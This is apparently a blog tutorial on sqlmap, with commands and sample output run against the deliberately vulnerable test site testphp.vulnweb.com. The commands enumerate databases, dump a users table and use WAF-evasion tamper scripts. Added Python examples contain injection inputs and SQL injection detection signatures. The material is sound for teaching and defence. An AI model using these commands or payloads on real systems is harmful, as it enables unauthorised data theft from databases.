In this blog, we will learn about the sqlmap command-line tool, one of the most popular SQL injection tools. Sqlmap provides great features compared with other SQL injection tools. So let’s get started with the blog.

Introduction

SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities in web applications. It is specifically designed for testing the security of database-driven web applications.

SQLMap utilizes various techniques to identify and exploit SQL injection flaws.

It can perform tasks such as fingerprinting the database management system, extracting database schema information, dumping table entries, and even gaining command execution on the underlying operating system.

Features of SqlMap Tool

Here are some key features of SQLMap:

Automated detection:

SQLMap can automatically detect SQL injection vulnerabilities in web applications by analyzing request parameters and payloads.

Fingerprinting:

It can determine the type and version of the database management system used by the target application.

Database enumeration:

SQLMap can extract useful information from the database, such as database names, tables, columns, and user accounts.

Data extraction:

It can retrieve the contents of database tables and perform data dumps.

Privilege escalation:

SQLMap can attempt to escalate privileges within the database system, allowing the attacker to gain administrative access.

OS interaction:

It can execute operating system commands on the underlying server, enabling the attacker to interact with the host system.

Brute forcing:

SQLMap can perform brute force attacks to guess usernames and passwords in the database.

Exploitation modules:

It supports various exploitation techniques, including time-based blind SQL injection, stacked queries, and out-of-band techniques.

Advantages

Some of the advantages of SqlMap include:

Automatic detection of SQL injection vulnerabilities:

SqlMap automates the process of identifying SQL injection vulnerabilities in web applications. It analyzes the target application’s parameters and payloads to determine if they are vulnerable to SQL injection attacks.

Comprehensive SQL injection exploitation:

SqlMap goes beyond simply detecting SQL injection vulnerabilities. It provides a wide range of techniques and options to exploit these vulnerabilities, including retrieving data from databases, executing commands on the underlying operating system, and even gaining a command shell on the targeted server.

Support for various database management systems (DBMS):

SqlMap supports a wide range of database management systems, including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, SQLite, and more. It adjusts its techniques and payloads based on the specific characteristics of the target DBMS, making it versatile and adaptable.

Automated fingerprinting and enumeration:

SqlMap can automatically fingerprint the database management system and enumerate the database structure, tables, columns, and other relevant information. This feature helps in understanding the database schema and assists in crafting specific SQL injection payloads.

Batch scanning and reporting:

SqlMap allows for batch scanning, where multiple URLs or parameters can be scanned simultaneously. It generates comprehensive reports detailing the vulnerabilities found, the exploitation process, and the retrieved data. These reports are useful for security audits and further analysis.

Customization and extensibility:

SqlMap provides extensive options for customization, allowing users to fine-tune the scanning process according to their requirements. It also supports plugins and scripts, which can be developed to enhance its functionality and address specific testing scenarios.

Active community support:

SqlMap has a large and active community of users and developers. This means that there are frequent updates, bug fixes, and new features being added to the tool. The community also provides support and resources for beginners and advanced users alike.

Education and awareness:

SqlMap is widely used as a teaching tool for understanding SQL injection attacks and their impact on web applications. It helps raise awareness among developers and security professionals about the importance of secure coding practices and proper input validation.

Disadvantages

Here are a few disadvantages to consider:

False positives and false negatives:

Like any automated security tool, SqlMap may generate false positives, identifying vulnerabilities that do not actually exist. Similarly, it can miss certain SQL injection vulnerabilities, leading to false negatives. It is important to manually verify the findings and perform additional testing to ensure accuracy.

Limited effectiveness against advanced evasion techniques:

Some advanced web application firewalls (WAFs) and security measures are designed to detect and prevent SQL injection attacks. SqlMap’s techniques might be detected by these security mechanisms, leading to blocked or ineffective exploitation attempts.

Potential for unintended consequences:

SqlMap has the potential to cause unintended consequences or disruptions to the target system. Exploiting vulnerabilities without proper authorization or understanding can lead to system crashes, data corruption, or unauthorized access. It is crucial to use SqlMap responsibly and with proper authorization.

Lack of support for certain edge cases:

While SqlMap supports a wide range of database management systems, there might be cases where it doesn’t fully support specific DBMS versions or features. This limitation can impact its effectiveness against certain targets or make it more challenging to exploit certain vulnerabilities.

Lack of real-time monitoring and feedback:

SqlMap’s scanning and exploitation processes are not real-time or interactive. It performs a series of predefined steps and generates a report at the end. This lack of real-time feedback can make it challenging to adapt and respond to dynamic web applications or complex scenarios that require manual intervention.

SqlMap Commands

The examples below run against the deliberately vulnerable test site testphp.vulnweb.com.

A) Techniques

SQLMap allows you to specify the injection technique to be used.

The --technique option accepts one or more of the following letters:

B: Boolean-based blind.

E: Error-based.

U: UNION query-based.

S: Stacked queries.

T: Time-based blind.

Q: Inline queries.

Syntax:

--technique=<letters>

Example:

$ sqlmap -u http://testphp.vulnweb.com/ --crawl=3 --technique="U" --batch

The above command reports only UNION-based injection findings, because we passed the option U.
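As an added example (not code from the original post or from the sqlmap project), the following Python script shows on a constructed in-memory SQLite database what the boolean (B) and UNION (U) techniques listed above depend on, and how input validation plus parameter binding removes the injection point entirely. The table names, sample rows and function names are assumptions made for this demonstration.

```python
import re
import sqlite3

# Constructed sample data for the walk-through (not the acuart database from the page).
PRODUCTS = [(1, "Lamp", 1), (2, "Chair", 1), (3, "Poster", 2), (4, "Mug", 3)]
USERS = [(1, "alice", "not-a-real-hash"), (2, "bob", "not-a-real-hash")]


def make_db():
    """In-memory SQLite database standing in for a small shop backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, cat INTEGER)")
    conn.execute("CREATE TABLE users (id INTEGER, uname TEXT, pass TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def list_products_vulnerable(conn, cat):
    # The request parameter is spliced into the SQL text, so it can change the
    # structure of the query. A tautology widens the WHERE clause (boolean
    # technique); a UNION appends rows from another table (UNION technique).
    sql = "SELECT id, name FROM products WHERE cat = " + cat
    return conn.execute(sql).fetchall()


def list_products_hardened(conn, cat):
    # 1. Validate: a category is a small non-negative integer, nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", cat):
        raise ValueError("cat must be a small non-negative integer")
    # 2. Bind: the value travels to the driver separately from the SQL text,
    #    so it is never parsed as part of the query grammar.
    sql = "SELECT id, name FROM products WHERE cat = ?"
    return conn.execute(sql, (int(cat),)).fetchall()


def demo():
    """Return what each version answers for a normal and two hostile inputs."""
    conn = make_db()
    hostile = ["1 OR 1=1", "0 UNION SELECT id, uname FROM users"]
    result = {"vulnerable": {}, "hardened": {}}
    for value in ["1"] + hostile:
        result["vulnerable"][value] = list_products_vulnerable(conn, value)
        try:
            result["hardened"][value] = list_products_hardened(conn, value)
        except ValueError as exc:
            result["hardened"][value] = f"rejected: {exc}"
    return result


if __name__ == "__main__":
    for version, answers in demo().items():
        print(version)
        for value, rows in answers.items():
            print(f"  cat={value!r:45} -> {rows}")
```

The vulnerable function returns every product for the tautology and the users' rows for the UNION input; the hardened one returns the same two products for `cat=1` and rejects both hostile values before any SQL runs.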

B) Crawl

It helps us to crawl the website to get additional URLs.

Syntax:

--crawl=depth

Examples:

$ sqlmap -u http://testphp.vulnweb.com/ --crawl=3

The above command stores its results in .csv format in the “.sqlmap” folder. The problem with this command is that we have to answer every prompt during the scan.

To prevent this you can also use the --batch option, which automatically selects the default answer for each question.

$ sqlmap -u http://testphp.vulnweb.com/ --crawl=3 --batch

C) Thread

The --threads option allows you to specify the number of threads to be used by SQLmap.

Note that the maximum number of threads you can use depends on your system’s capabilities, available resources, and network bandwidth.

It is recommended to start with a reasonable number of threads and adjust accordingly based on the performance and stability of your system.

By default, it is 1.

$ sqlmap -u http://testphp.vulnweb.com/ --crawl=3 --batch --threads=1

D) Risk

In SQLmap, the --risk option is used to specify the level of risk for the vulnerability tests performed during the scanning process. The risk level determines the aggressiveness of the SQL injection tests that SQLmap conducts.

$ sqlmap -u http://testphp.vulnweb.com/ --risk=<risk_level>

Replace <risk_level> with a value between 1 and 3, where:

  • Risk Level 1: This is the lowest risk level. It performs basic SQL injection tests with fewer requests and less aggressive techniques. It is suitable for environments where there is a concern about causing disruptions or high server loads.
  • Risk Level 2: This is the default risk level. It performs more extensive SQL injection tests using a wider range of techniques and payloads. It is a balanced option that provides a good compromise between thoroughness and potential impact.
  • Risk Level 3: This is the highest risk level. It employs the most aggressive techniques and payloads to maximize the chances of identifying SQL injection vulnerabilities. It may generate a higher number of requests and potentially cause more load on the target server.

E) Level

In SQLmap, the --level option is used to specify the level of depth for the crawling and scanning process. The level determines how far SQLmap will traverse the website’s structure to discover additional URLs and perform tests.

Here’s how to use the --level option in the SQLmap command:

$ sqlmap -u http://testphp.vulnweb.com/ --level=<crawling_level>

Replace <crawling_level> with a value between 1 and 5, where:

  • Level 1: This is the lowest crawling level. SQLmap will only scan the target URL and its immediate links, without going deeper into the website’s structure.
  • Level 2: SQLmap will scan the target URL, its immediate links, and links found on those pages. It will go one level deeper into the website’s structure.
  • Level 3 to 5: SQLmap will perform increasingly deeper scans, going further into the website’s structure and following more links at each level.

Note: Using the risk and level options simultaneously can produce false positive or false negative results.

F) Verbosity

In SQLmap, the -v option is used to control the level of verbosity or detail in the output generated during the scanning process. This option allows you to specify how much information you want SQLmap to display.

Here’s how to use the -v option in the SQLmap command:

$ sqlmap -u <target_URL> -v <verbosity_level>

Replace <verbosity_level> with a value between 0 and 3, where:

  • Level 0: This is the lowest verbosity level. Only critical information and errors are displayed in the output.
  • Level 1: This level provides more information than level 0, including warnings and additional details about the scanning process.
  • Level 2: This level is more verbose and provides extensive output, including details about requests, payloads, and test results.
  • Level 3: This is the highest verbosity level. It provides the most detailed output, including all HTTP requests and responses, as well as debugging information.

G) Enumeration

The enumeration in SQLmap refers to the process of identifying and extracting specific information from a database or web application through automated scanning.

A) See the Configuration of the Server

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-user --current-db --hostname --batch

[12:00:45] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[12:00:45] [INFO] fetching current user
[12:00:45] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries)
[12:00:47] [INFO] retrieved: 'acuart@localhost'
current user: 'acuart@localhost'
[12:00:47] [INFO] fetching current database
[12:00:48] [INFO] retrieved: 'acuart'
current database: 'acuart'
[12:00:48] [INFO] fetching server hostname
[12:00:49] [INFO] retrieved: 'ip-10-0-0-222'
hostname: 'ip-10-0-0-222'

Here you can see all the configurations of a database.

B) To list all the databases on the server

To know all the databases of the server, you should use the --dbs option.

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

available databases [2]:
[*] acuart
[*] information_schema

C) To list all the tables in the database on the server.

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

Here, “acuart” is the database name.

D) See all the data of a particular table

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --dump

[1 entry]
+---------------------+----------------------------------+------+-----------------+---------+-------+--------+-----------+
| cc                  | cart                             | pass | email           | phone   | uname | name   | address   |
+---------------------+----------------------------------+------+-----------------+---------+-------+--------+-----------+
| 1234-5678-2300-9000 | 36886fd3ea81cb38ff5c4cf1fb361aba | test | email@email.com | 2323345 | test  | Anjay  | 21 street |
+---------------------+----------------------------------+------+-----------------+---------+-------+--------+-----------+

E) To see the datatype of a column in a table

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| name    | varchar(100) |
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

F) To dump all the data in every table

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --dump-all

H) Output Directory

$ sqlmap -u http://testphp.vulnweb.com --crawl=3 --output-dir="/home/Downloads" --batch

This will store the result as per the user’s directory.

I) Headers

In SQLmap, the --headers option allows you to specify custom headers to be included in the HTTP requests sent during the scanning process.

This option is useful when you want to provide additional headers or modify existing headers to simulate specific requests or interact with the target server in a desired way. Multiple headers are separated with \n inside the quoted value.

$ sqlmap -u <target_URL> --headers="Referer: http://example.com\nUser-Agent: MyCustomUserAgent" -v 4

J) User Agent

In SQLmap, the --user-agent option allows you to specify a custom User-Agent header in the HTTP requests sent during the scanning process.

The User-Agent header is a standard part of an HTTP request that identifies the client software or user agent making the request.

Here’s how to use the --user-agent option in the SQLmap command:

$ sqlmap -u <target_URL> --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" -v 4

K) Tamper

In SQLmap, the --tamper option allows you to specify custom script files or modules that modify the SQL injection payloads sent by SQLmap.

These tamper scripts can help evade security defenses, modify payloads, or perform other transformations on the injected SQL queries.

Tamper scripts can modify SQL injection payloads in various ways, such as encoding characters, obfuscating queries, or bypassing WAF (Web Application Firewall) filters.

They allow you to customize the payloads sent by SQLmap to increase the chances of successful exploitation or bypassing security defenses.

To see the list of all available tamper scripts:

$ sqlmap --list-tampers

To use the tamper list:

$ sqlmap -u <target_URL> --tamper=<tamper_script>
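From the defender's side, the User-Agent and tamper sections above point at two things worth checking in web server logs: sqlmap's default User-Agent string (which a tester only hides by passing --user-agent) and payloads that arrive URL-encoded or with spaces replaced by inline comments, as tamper scripts do. The following Python script is an added example, not code from the original post or from the sqlmap project. It runs over constructed combined-format access log lines (the IPs, timestamps, version string and payloads are made up for the demonstration; the User-Agent is modelled on sqlmap's default) and normalises each query string before matching a few coarse signatures, so that the same pattern is caught whether it was sent plain, percent-encoded, or comment-padded.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache/nginx "combined" log lines for the walk-through (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:45 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.9 - - [01/Jan/2024:12:00:46 +0000] "GET /listproducts.php?cat=1%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2024:12:00:47 +0000] "GET /listproducts.php?cat=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- HTTP/1.1" 200 7000 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [01/Jan/2024:12:00:48 +0000] "GET /listproducts.php?cat=1/**/AND/**/SLEEP(5) HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.7 - - [01/Jan/2024:12:00:49 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# One combined-format line: ip ident user [ts] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Coarse signatures, matched against the normalised (decoded, lower-cased) query string.
SIGNATURES = [
    ("tautology", re.compile(r"\b(and|or) \d+ ?= ?\d+\b")),
    ("union-select", re.compile(r"\bunion( all)? select\b")),
    ("time-delay", re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(")),
    ("comment-terminator", re.compile(r"--\s|#\s*$")),
]


def normalize_query(query: str) -> str:
    """URL-decode twice (double encoding), drop inline comments, squash whitespace."""
    text = unquote_plus(unquote_plus(query))
    text = re.sub(r"/\*.*?\*/", " ", text)  # comment padding used in place of spaces
    return re.sub(r"\s+", " ", text).strip().lower()


def classify(entry: dict) -> list:
    """Return the list of reasons a parsed log entry looks like SQL injection traffic."""
    reasons = []
    if entry["ua"].lower().startswith("sqlmap/"):
        reasons.append("sqlmap-user-agent")
    norm = normalize_query(urlsplit(entry["target"]).query)
    for name, pattern in SIGNATURES:
        if pattern.search(norm):
            reasons.append(name)
    return reasons


def scan_log(text: str) -> list:
    """Parse every line and keep only the entries that triggered at least one reason."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not in combined format; a real pipeline would count these
        entry = match.groupdict()
        reasons = classify(entry)
        if reasons:
            findings.append({"ip": entry["ip"], "ts": entry["ts"],
                             "target": entry["target"], "reasons": reasons})
    return findings


def hits_per_source(findings: list) -> dict:
    """Count flagged requests per client IP, the usual pivot for an alert."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["target"], "->", ", ".join(f["reasons"]))
    print(hits_per_source(scan_log(SAMPLE_LOG)))
```

The benign request for `cat=1` and the search for "union station" are not flagged, while the three probes from one source are, each for a different reason; the normalisation step is what lets the comment-padded `SLEEP(5)` line match the same signature as a plain one would.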

Conclusion

It’s important to note that SQLMap should only be used on systems you have explicit permission to test, as it is a powerful tool that can cause damage if used improperly.

Always follow ethical guidelines and obtain proper authorization before conducting any security testing.

FAQ

What is the use of SqlMap Command?

SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities in web applications. It is specifically designed for testing the security of database-driven web applications.
SQLMap utilizes various techniques to identify and exploit SQL injection flaws.
It can perform tasks such as fingerprinting the database management system, extracting database schema information, dumping table entries, and even gaining command execution on the underlying operating system.
